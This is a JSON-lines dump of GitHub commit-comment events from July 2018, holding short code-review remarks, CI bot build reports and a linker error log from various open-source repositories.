{"id":"7978214583","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738415,"position":64,"line":64,"path":"app/src/main/java/com/example/delhivery/newsapp/DetailActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T17:37:07Z","updated_at":"2018-07-17T17:37:07Z","author_association":"NONE","body":"Checkout Butterknife"}},"created_at":"2018-07-17T17:37:07Z"}
{"id":"7978216131","type":"CommitCommentEvent","actor":{"login":"Djeymisson"},"repo":{"name":"AlanaTenorio/Agrotur"},"payload":{"comment":{"id":29738419,"position":null,"line":null,"path":null,"commit_id":"22a4bf41c345a80aa014190b1e925718e236d5d5","created_at":"2018-07-17T17:37:25Z","updated_at":"2018-07-17T17:37:25Z","author_association":"COLLABORATOR","body":"Adicionado a instalação do PHPSpecs no arquivo do Composer. Adicionado o Driver do BD no arquivo de configuração do PHPUnit."}},"created_at":"2018-07-17T17:37:25Z"}
{"id":"7978217788","type":"CommitCommentEvent","actor":{"login":"Maijin"},"repo":{"name":"radare/radare2book"},"payload":{"comment":{"id":29738420,"position":5,"line":5,"path":"credits/credits.md","commit_id":"0b0d750553dd684a43cdae0bde1e326915722df1","created_at":"2018-07-17T17:37:41Z","updated_at":"2018-07-17T17:37:41Z","author_association":"COLLABORATOR","body":"Can probably move that away to get it under contributors too."}},"created_at":"2018-07-17T17:37:41Z"}
{"id":"7978220477","type":"CommitCommentEvent","actor":{"login":"ortegon000"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29738426,"position":null,"line":null,"path":null,"commit_id":"57d7b1fef9fa48899b99dd240d89a2ef4cbafc4b","created_at":"2018-07-17T17:38:12Z","updated_at":"2018-07-17T17:38:12Z","author_association":"NONE","body":"this is causing aun issue\r\nWill this stay like this?\r\nissue: preg_quote() expects parameter 1 to be string, array given"}},"created_at":"2018-07-17T17:38:12Z"}
{"id":"7978220671","type":"CommitCommentEvent","actor":{"login":"Ahmed-ShawkyEgy"},"repo":{"name":"Ahmed-ShawkyEgy/Iris-dataset"},"payload":{"comment":{"id":29738427,"position":null,"line":null,"path":null,"commit_id":"f27bd0a7254c61b121c92b57c844f5d30299cfcf","created_at":"2018-07-17T17:38:14Z","updated_at":"2018-07-17T17:38:14Z","author_association":"OWNER","body":"yes"}},"created_at":"2018-07-17T17:38:14Z"}
{"id":"7978224301","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29738437,"position":7,"line":144,"path":"src/opnsense/mvc/app/library/OPNsense/Backup/Nextcloud.php","commit_id":"50fb5bcb0c8f1c97653acd282394bdadb4e9b9ce","created_at":"2018-07-17T17:38:54Z","updated_at":"2018-07-17T17:38:54Z","author_association":"MEMBER","body":"@fichtner It wasn't released, so don't worry ;)"}},"created_at":"2018-07-17T17:38:54Z"}
{"id":"7978224741","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29738439,"position":29,"line":29,"path":"Homework_4/Tasks.java","commit_id":"cb0c0a2313bda2d3be9e206aa6222d6c246c54de","created_at":"2018-07-17T17:38:59Z","updated_at":"2018-07-17T17:38:59Z","author_association":"OWNER","body":"для чого нам тут ще раз if (anB <= min), ми і так сюди попадемо"}},"created_at":"2018-07-17T17:38:59Z"}
{"id":"7978227465","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29738443,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-17T17:39:29Z","updated_at":"2018-07-17T17:39:29Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2319 of 2319 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T17:39:29Z"}
{"id":"7978228713","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29738444,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-17T17:39:43Z","updated_at":"2018-07-17T17:39:43Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-17T17:39:43Z"}
{"id":"7978235491","type":"CommitCommentEvent","actor":{"login":"miracode2033"},"repo":{"name":"Kasendwa/search-movies"},"payload":{"comment":{"id":29738453,"position":null,"line":null,"path":null,"commit_id":"55ec7d8bd2968b1d1f389106f296aa3008730451","created_at":"2018-07-17T17:40:57Z","updated_at":"2018-07-17T17:40:57Z","author_association":"NONE","body":"Thank Mr Ronald, i loved the session."}},"created_at":"2018-07-17T17:40:57Z"}
{"id":"7978238010","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29738463,"position":21,"line":21,"path":"Homework_5/Tasks.java","commit_id":"cb0c0a2313bda2d3be9e206aa6222d6c246c54de","created_at":"2018-07-17T17:41:25Z","updated_at":"2018-07-17T17:41:25Z","author_association":"OWNER","body":"а так буде працювати\r\nreturn sum;"}},"created_at":"2018-07-17T17:41:25Z"}
{"id":"7978238967","type":"CommitCommentEvent","actor":{"login":"BarabasGitHub"},"repo":{"name":"ziglang/zig"},"payload":{"comment":{"id":29738464,"position":93,"line":6289,"path":"src/analyze.cpp","commit_id":"e9a03cccf375f11aa4e0a8a3515e499c88d05cde","created_at":"2018-07-17T17:41:34Z","updated_at":"2018-07-17T17:41:34Z","author_association":"CONTRIBUTOR","body":"Curiously it works though. =D"}},"created_at":"2018-07-17T17:41:34Z"}
{"id":"7978252573","type":"CommitCommentEvent","actor":{"login":"altayaydemir"},"repo":{"name":"ivan133/react-json-logic"},"payload":{"comment":{"id":29738485,"position":null,"line":null,"path":null,"commit_id":"7b446512b287ded0f70808a271078a67ec51cb62","created_at":"2018-07-17T17:44:03Z","updated_at":"2018-07-17T17:44:03Z","author_association":"NONE","body":"🙄wanna open a pr for this? 😅👍 "}},"created_at":"2018-07-17T17:44:03Z"}
{"id":"7978253680","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29738487,"position":48,"line":300,"path":"code/drasil-lang/Language/Drasil/Printing/Import.hs","commit_id":"d788d4b4960ac34ba70562ec54118315fd509ffe","created_at":"2018-07-17T17:44:16Z","updated_at":"2018-07-17T17:44:16Z","author_association":"COLLABORATOR","body":"Please note: all these `fixmelabel*`s are going to be removed. They were put into place temporarily to get past build errors."}},"created_at":"2018-07-17T17:44:16Z"}
{"id":"7978253868","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738488,"position":65,"line":65,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T17:44:18Z","updated_at":"2018-07-17T17:44:18Z","author_association":"NONE","body":"Use Loader instead of code in activity. Repeating code in a function. RetrofitClient class"}},"created_at":"2018-07-17T17:44:18Z"}
{"id":"7978257844","type":"CommitCommentEvent","actor":{"login":"baluragala"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29738496,"position":null,"line":null,"path":null,"commit_id":"40b18a5222db2a8c87ee896631da4aa7f751112a","created_at":"2018-07-17T17:45:04Z","updated_at":"2018-07-17T17:45:04Z","author_association":"COLLABORATOR","body":"Please move authentication and authorization to separate mode. Also please keep all examples self contained, which means the code must be executed independently when respective package deps installed"}},"created_at":"2018-07-17T17:45:04Z"}
{"id":"7978258275","type":"CommitCommentEvent","actor":{"login":"Nowosad"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29738499,"position":null,"line":null,"path":null,"commit_id":"168320d97a0674cc22c04ce036b314d3cbaea2f9","created_at":"2018-07-17T17:45:10Z","updated_at":"2018-07-17T17:45:10Z","author_association":"COLLABORATOR","body":"Great! Thanks Robin"}},"created_at":"2018-07-17T17:45:10Z"}
{"id":"7978258808","type":"CommitCommentEvent","actor":{"login":"Progyan1997"},"repo":{"name":"amitpatil321/mesh_app"},"payload":{"comment":{"id":29738500,"position":44,"line":52,"path":"models/updater.js","commit_id":"feadda53b329ec7defea3893bac6b59489476580","created_at":"2018-07-17T17:45:15Z","updated_at":"2018-07-17T17:45:15Z","author_association":"COLLABORATOR","body":"No this won't be shown in `app` open, this will be shown only if the user him/herself checks for an update. The flag is set in `config.user`"}},"created_at":"2018-07-17T17:45:15Z"}
{"id":"7978260561","type":"CommitCommentEvent","actor":{"login":"Progyan1997"},"repo":{"name":"amitpatil321/mesh_app"},"payload":{"comment":{"id":29738503,"position":68,"line":75,"path":"models/updater.js","commit_id":"feadda53b329ec7defea3893bac6b59489476580","created_at":"2018-07-17T17:45:34Z","updated_at":"2018-07-17T17:45:34Z","author_association":"COLLABORATOR","body":"Okay 👍 "}},"created_at":"2018-07-17T17:45:34Z"}
{"id":"7978260866","type":"CommitCommentEvent","actor":{"login":"baluragala"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29738504,"position":null,"line":null,"path":null,"commit_id":"0f559767a646f7221462d98a5027488c6b2cfafd","created_at":"2018-07-17T17:45:37Z","updated_at":"2018-07-17T17:45:37Z","author_association":"COLLABORATOR","body":"thanks, will look into it"}},"created_at":"2018-07-17T17:45:37Z"}
{"id":"7978262636","type":"CommitCommentEvent","actor":{"login":"vanditapandit"},"repo":{"name":"sfmcdg/sfmcdg.github.io"},"payload":{"comment":{"id":29738508,"position":null,"line":null,"path":null,"commit_id":"53f38f9b7bb77ccb040f3c232ae7dd725dca6573","created_at":"2018-07-17T17:45:57Z","updated_at":"2018-07-17T17:45:57Z","author_association":"NONE","body":"Can you please upload video on journey builder"}},"created_at":"2018-07-17T17:45:57Z"}
{"id":"7978274016","type":"CommitCommentEvent","actor":{"login":"Nowosad"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29738526,"position":null,"line":null,"path":null,"commit_id":"168320d97a0674cc22c04ce036b314d3cbaea2f9","created_at":"2018-07-17T17:48:07Z","updated_at":"2018-07-17T17:48:07Z","author_association":"COLLABORATOR","body":"The only thing - it should inform the readers that the input type is from Section 2.1.5.1, because the numbers in the table depends on the number of elements in the input objects."}},"created_at":"2018-07-17T17:48:07Z"}
{"id":"7978280233","type":"CommitCommentEvent","actor":{"login":"XVilka"},"repo":{"name":"radare/radare2book"},"payload":{"comment":{"id":29738541,"position":5,"line":5,"path":"credits/credits.md","commit_id":"0b0d750553dd684a43cdae0bde1e326915722df1","created_at":"2018-07-17T17:49:17Z","updated_at":"2018-07-17T17:49:17Z","author_association":"COLLABORATOR","body":"I think we should also move credits at the end of the book, nobody usually reads this part anyway."}},"created_at":"2018-07-17T17:49:17Z"}
{"id":"7978280974","type":"CommitCommentEvent","actor":{"login":"DrThum"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29738543,"position":5,"line":727,"path":"src/server/game/Server/Protocol/Opcodes.cpp","commit_id":"9f1ec584c31498b2a68ae993e935d6b2c9ee9ea1","created_at":"2018-07-17T17:49:25Z","updated_at":"2018-07-17T17:49:25Z","author_association":"NONE","body":"Good catch!"}},"created_at":"2018-07-17T17:49:25Z"}
{"id":"7978281631","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29738544,"position":52,"line":52,"path":"mlvision/MLVisionExampleObjc/CameraViewController.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-17T17:49:33Z","updated_at":"2018-07-17T17:49:33Z","author_association":"NONE","body":"indent two spaces"}},"created_at":"2018-07-17T17:49:33Z"}
{"id":"7978281804","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29738545,"position":null,"line":null,"path":null,"commit_id":"9b60cfa52acb373a8bbb9df6adee907c7735f0e3","created_at":"2018-07-17T17:49:35Z","updated_at":"2018-07-17T17:49:35Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/b0d68cb99ca276652e97c7f215b0dad6396922af/.circleci/config.yml)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/964dd370ea52ae552902f1fa0f05412f37f3bf14/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-17T17:49:35Z"}
{"id":"7978287605","type":"CommitCommentEvent","actor":{"login":"hnyman"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29738561,"position":null,"line":null,"path":null,"commit_id":"888a15ff8312cd157bc968b67c33d2f738883b79","created_at":"2018-07-17T17:50:40Z","updated_at":"2018-07-17T17:50:40Z","author_association":"CONTRIBUTOR","body":"@nbd168 \r\nLooks like pptp needs fPIC fix, too.\r\n\r\nCompilation fails on some platforms, e.g. ar71xx / mips_24kc\r\n\r\nI encountered the problem on my own build, and buildbot also runs into it:\r\nhttp://downloads.lede-project.org/snapshots/faillogs/mips_24kc/base/ppp/default/compile.txt\r\n```\r\nmips-openwrt-linux-musl-gcc -o pptp.so -shared dirutil.o orckit_quirks.o pptp.o pptp_callmgr.o pptp_ctrl.o pptp_quirks.o util.o vector.o\r\n/data/bowl-builder/mips_24kc/build/sdk/staging_dir/toolchain-mips_24kc_gcc-7.3.0_musl/bin/../lib/gcc/mips-openwrt-linux-musl/7.3.0/../../../../mips-openwrt-linux-musl/bin/ld: /data/bowl-builder/mips_24kc/build/sdk/tmp/cceNbwrz.ltrans0.ltrans.o: relocation R_MIPS16_26 against `close' can not be used when making a shared object; recompile with -fPIC\r\n/data/bowl-builder/mips_24kc/build/sdk/staging_dir/toolchain-mips_24kc_gcc-7.3.0_musl/bin/../lib/gcc/mips-openwrt-linux-musl/7.3.0/../../../../mips-openwrt-linux-musl/bin/ld: non-dynamic relocations refer to dynamic symbol close\r\n/data/bowl-builder/mips_24kc/build/sdk/staging_dir/toolchain-mips_24kc_gcc-7.3.0_musl/bin/../lib/gcc/mips-openwrt-linux-musl/7.3.0/../../../../mips-openwrt-linux-musl/bin/ld: failed to set dynamic section sizes: Bad value\r\ncollect2: error: ld returned 1 exit status\r\nMakefile:23: recipe for target 'pptp.so' failed\r\n```\r\n"}},"created_at":"2018-07-17T17:50:40Z"}
{"id":"7978289201","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738563,"position":91,"line":91,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T17:50:57Z","updated_at":"2018-07-17T17:50:57Z","author_association":"NONE","body":"Avoid using alphabets as a variable name, it won't make sense in future. "}},"created_at":"2018-07-17T17:50:57Z"}
{"id":"7978290831","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29738567,"position":null,"line":null,"path":null,"commit_id":"3c32418c59d1df48c66a5f2bc817d7c01003fec3","created_at":"2018-07-17T17:51:15Z","updated_at":"2018-07-17T17:51:15Z","author_association":"COLLABORATOR","body":"Okay fantastic I’ll look into that. I’m slightly concerned that NVIDIA doesn’t seem to support batching sparse matrix multiplies the way that they do with FFT’s and standard dense Cublas… makes me wonder wether some sort of convolution based approach where we split the antenna space using fft linearity might be quicker..\n\n> On 17 Jul 2018, at 10:16, jaycedowell <notifications@github.com> wrote:\n> \n> Yeah, I don't know of any spare matrix support inside bifrost. Writing a new bifrost block is not that hard, though. The fdmt and fir blocks are good examples of how to write simple blocks. A lot of what goes into writing the block is the data type/space/size checking and the initial setup of any internal variables needed.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/nithyanandan/EPIC/commit/3c32418c59d1df48c66a5f2bc817d7c01003fec3#commitcomment-29738162>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AB73hAEyk7cZoJo67pX3tPubyOtxM6s1ks5uHhvtgaJpZM4VTMN8>.\n> \n\n"}},"created_at":"2018-07-17T17:51:15Z"}
{"id":"7978291669","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29738570,"position":10,"line":63,"path":"spec/config_spec.cr","commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-17T17:51:25Z","updated_at":"2018-07-17T17:51:25Z","author_association":"CONTRIBUTOR","body":"This will fail in the very next release, more sensible would be to parse the `shard.yml` file and use that."}},"created_at":"2018-07-17T17:51:25Z"}
{"id":"7978293267","type":"CommitCommentEvent","actor":{"login":"eu-vinnom"},"repo":{"name":"L3vi47h4N/Viper4Linux"},"payload":{"comment":{"id":29738573,"position":null,"line":null,"path":null,"commit_id":"0719e21a8c8bab30377bbc82fe213e1ec0cfd657","created_at":"2018-07-17T17:51:42Z","updated_at":"2018-07-17T17:51:42Z","author_association":"NONE","body":"Hi man!\r\n\r\nthe \"automake\" alongside \"base-devel\" isn't needed as \"automake\" is part of the \"base-devel\" group.\r\n\r\nSee here https://www.archlinux.org/groups/x86_64/base-devel/\r\n\r\nThanks for this, just installed on my arch and is working like a charm =)"}},"created_at":"2018-07-17T17:51:42Z"}
{"id":"7978293402","type":"CommitCommentEvent","actor":{"login":"hfz-r"},"repo":{"name":"JohnnyCrazy/SpotifyAPI-NET"},"payload":{"comment":{"id":29738574,"position":null,"line":null,"path":null,"commit_id":"023520d3de18c202e00989c21d7046da9a2706bc","created_at":"2018-07-17T17:51:43Z","updated_at":"2018-07-17T17:51:43Z","author_association":"NONE","body":"hi. I`m new to this. Just compiled and hit error on both of this pages. Did I missed anything? Previous committed item #194 worked on me."}},"created_at":"2018-07-17T17:51:43Z"}
{"id":"7978293605","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29738575,"position":108,"line":108,"path":"mlvision/MLVisionExampleObjc/CameraViewController.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-17T17:51:46Z","updated_at":"2018-07-17T17:51:46Z","author_association":"NONE","body":"can remove `!faces` since `faces.count == 0` does both nil and count check."}},"created_at":"2018-07-17T17:51:46Z"}
{"id":"7978293665","type":"CommitCommentEvent","actor":{"login":"gabrielfaleiro"},"repo":{"name":"gabrielfaleiro/hello-world"},"payload":{"comment":{"id":29738576,"position":6,"line":5,"path":"README.md","commit_id":"06931f19419efce72404ea3153c77e8c9db25f8f","created_at":"2018-07-17T17:51:47Z","updated_at":"2018-07-17T17:51:47Z","author_association":"OWNER","body":"Testing comment"}},"created_at":"2018-07-17T17:51:47Z"}
{"id":"7978294341","type":"CommitCommentEvent","actor":{"login":"gabrielfaleiro"},"repo":{"name":"gabrielfaleiro/hello-world"},"payload":{"comment":{"id":29738578,"position":3,"line":3,"path":"README.md","commit_id":"06931f19419efce72404ea3153c77e8c9db25f8f","created_at":"2018-07-17T17:51:54Z","updated_at":"2018-07-17T17:51:54Z","author_association":"OWNER","body":"Why??"}},"created_at":"2018-07-17T17:51:54Z"}
{"id":"7978294541","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738579,"position":101,"line":101,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T17:51:56Z","updated_at":"2018-07-17T17:51:56Z","author_association":"NONE","body":"ScalarsConverterFactory?\r\n"}},"created_at":"2018-07-17T17:51:56Z"}
{"id":"7978295812","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29738584,"position":113,"line":113,"path":"mlvision/MLVisionExampleObjc/CameraViewController.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-17T17:52:11Z","updated_at":"2018-07-17T17:52:11Z","author_association":"NONE","body":"nit: call this before the if check and then can remove the extra call inside if statement."}},"created_at":"2018-07-17T17:52:11Z"}
{"id":"7978299902","type":"CommitCommentEvent","actor":{"login":"Zant21"},"repo":{"name":"Zant21/hello-world"},"payload":{"comment":{"id":29738592,"position":2,"line":2,"path":"README.md","commit_id":"6bbb7efa370d544fa14048a068420cf12ce5f657","created_at":"2018-07-17T17:52:58Z","updated_at":"2018-07-17T17:52:58Z","author_association":"OWNER","body":"why?\r\n"}},"created_at":"2018-07-17T17:52:58Z"}
{"id":"7978301163","type":"CommitCommentEvent","actor":{"login":"evgenpatrushev"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29738593,"position":64,"line":65,"path":"DBConnector.py","commit_id":"0446ba6795144496cfb0f081e7009883eba7c6a1","created_at":"2018-07-17T17:53:12Z","updated_at":"2018-07-17T17:53:12Z","author_association":"COLLABORATOR","body":"**QUESTION!!!** Может вместо всей сложной и непонятной фигни которая идет дальше сделать триггер на эту таблицу. Триггер будет на insert, который будет проверять все данные на вход (будет смотреть есть ли такой id, если есть то проверить новые данные если все совпадает то забить и не вставлять новые), а в самой этой функции `insert_into_main_table(self)` сделаем просто insert всех данных с запроса. "}},"created_at":"2018-07-17T17:53:12Z"}
{"id":"7978302178","type":"CommitCommentEvent","actor":{"login":"ibreaker14"},"repo":{"name":"jsxgraph/jsxgraph"},"payload":{"comment":{"id":29738598,"position":null,"line":null,"path":null,"commit_id":"fd7d03f071a37c2dfb59a90e358a7ad495113a30","created_at":"2018-07-17T17:53:24Z","updated_at":"2018-07-17T17:53:24Z","author_association":"NONE","body":"Hello Wasserman, I checked out the new commit today and noticed that the 'hit' event do not work for mobile devices. Is it possible to extend its functionality to encompass devices with touch handlers as well?"}},"created_at":"2018-07-17T17:53:24Z"}
{"id":"7978303771","type":"CommitCommentEvent","actor":{"login":"evgenpatrushev"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29738607,"position":64,"line":65,"path":"DBConnector.py","commit_id":"0446ba6795144496cfb0f081e7009883eba7c6a1","created_at":"2018-07-17T17:53:42Z","updated_at":"2018-07-17T17:53:42Z","author_association":"COLLABORATOR","body":"не уверен что будет быстрее и лучше"}},"created_at":"2018-07-17T17:53:42Z"}
{"id":"7978304676","type":"CommitCommentEvent","actor":{"login":"Gorbush"},"repo":{"name":"drewnoakes/metadata-extractor"},"payload":{"comment":{"id":29738612,"position":6,"line":96,"path":"Source/com/drew/metadata/exif/ExifReader.java","commit_id":"5371827edfbed4dde6f5e8188ea48a53cce8bedb","created_at":"2018-07-17T17:53:51Z","updated_at":"2018-07-17T17:53:51Z","author_association":"NONE","body":"Hi.\r\nAny update on this?\r\n\r\nI tried to use the extracted method, but stuck because the offset is wrong.\r\nIf I use the ExifReader.JPEG_SEGMENT_PREAMBLE.length() .  which is 6 + offset mentioned in TAG_THUMBNAIL_OFFSET - it is still (for my file) :\r\n6 + 613 = 619\r\nHowever real image is located at 625\r\nAnd the old version of library 2.9.1 is extracting the right image at 625 - the buffer in reader seems like shifted.\r\nWhat am I missing? There are some 6 bytes - where they came from?"}},"created_at":"2018-07-17T17:53:51Z"}
{"id":"7978306351","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29738616,"position":4,"line":4,"path":"test.rb","commit_id":"a4e014d1a0a90831982a6701cc1a4c893e200ff9","created_at":"2018-07-17T17:54:11Z","updated_at":"2018-07-17T17:54:11Z","author_association":"OWNER","body":"test file"}},"created_at":"2018-07-17T17:54:11Z"}
{"id":"7978308108","type":"CommitCommentEvent","actor":{"login":"mrwanzein"},"repo":{"name":"mrwanzein/first-angular-portfolio"},"payload":{"comment":{"id":29738622,"position":null,"line":null,"path":null,"commit_id":"649a99a77f0080afe69c17b7ad7a49c9915d9abe","created_at":"2018-07-17T17:54:31Z","updated_at":"2018-07-17T17:54:31Z","author_association":"OWNER","body":"Was trying to fix a git push problem"}},"created_at":"2018-07-17T17:54:31Z"}
{"id":"7978312428","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29738630,"position":null,"line":null,"path":null,"commit_id":"9093197fec047907d227d521231b3e1aa37a5d92","created_at":"2018-07-17T17:55:19Z","updated_at":"2018-07-17T17:55:19Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |      0.1 |\n| `metadata_passing` |      2   |\n| `metadata_total`   |      2   |\n| `nodes_count`      |     59   |\n| `texts_total`      |      2   |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +15534 |\n\n## Units\n\n| Changed                                                     | Status   |\n|:------------------------------------------------------------|:---------|\n| `./data/tlg0638/__cts__.xml`                                | New      |\n| `./data/tlg0638/tlg007/__cts__.xml`                         | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml`     | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2_old.xml` | New      |\n| `./data/tlg0638/__cts__.xml`                                | Passing  |\n| `./data/tlg0638/tlg007/__cts__.xml`                         | Passing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml`     | Failing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2_old.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4459)*\n"}},"created_at":"2018-07-17T17:55:19Z"}
{"id":"7978313629","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29738633,"position":138,"line":138,"path":"mlvision/MLVisionExampleObjc/CameraViewController.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-17T17:55:35Z","updated_at":"2018-07-17T17:55:35Z","author_association":"NONE","body":"just call the property for these?\r\n\r\nself.annotationOverlayView\r\nself.previewLayer"}},"created_at":"2018-07-17T17:55:35Z"}
{"id":"7978319177","type":"CommitCommentEvent","actor":{"login":"jeffchrisope"},"repo":{"name":"UWCubeSat/DubSat1"},"payload":{"comment":{"id":29738646,"position":null,"line":null,"path":null,"commit_id":"73e5ab9f22c251252f0f5f23d6db199cc215416f","created_at":"2018-07-17T17:56:36Z","updated_at":"2018-07-17T17:56:36Z","author_association":"CONTRIBUTOR","body":"This broke all of our tests.  We were relying heavily on that one extra MTQ comment."}},"created_at":"2018-07-17T17:56:36Z"}
{"id":"7978322196","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29738651,"position":null,"line":null,"path":null,"commit_id":"3c32418c59d1df48c66a5f2bc817d7c01003fec3","created_at":"2018-07-17T17:57:12Z","updated_at":"2018-07-17T17:57:12Z","author_association":"COLLABORATOR","body":"Maybe the thing to do is to start out with standard cuBLAS operations and just see where that ends up in terms of performance.  That may not be the optimal choice in the long run but it does provide a relatively straight forward path to getting something that at least runs.  The bifrost `linalg` module implements a few matrix multiplication styles and we are currently using it for the wideband FX correlator."}},"created_at":"2018-07-17T17:57:12Z"}
{"id":"7978322474","type":"CommitCommentEvent","actor":{"login":"NilanthAnimosus"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29738652,"position":null,"line":null,"path":null,"commit_id":"5d342e24ef2fa3180cf39bf4cf11b836b7d18b42","created_at":"2018-07-17T17:57:15Z","updated_at":"2018-07-17T17:57:15Z","author_association":"NONE","body":"Just a further note on the above changes, but I see no changes for the gameclient.\r\n\r\n```csharp\r\nendVoteTickBox.Visible = Voting.AllowEndVoting && myCharacter != null;\r\n```\r\n\r\nthe gameclient.cs in the client project controls the visibility of its own end round checkbox based off its character being null or not, instead of having played the round or even just being allowed by the server in some form.\r\n\r\nI do not think the above changes will actually allow a vanilla client to vote end if his body is removed due to the update logic of the game client."}},"created_at":"2018-07-17T17:57:15Z"}
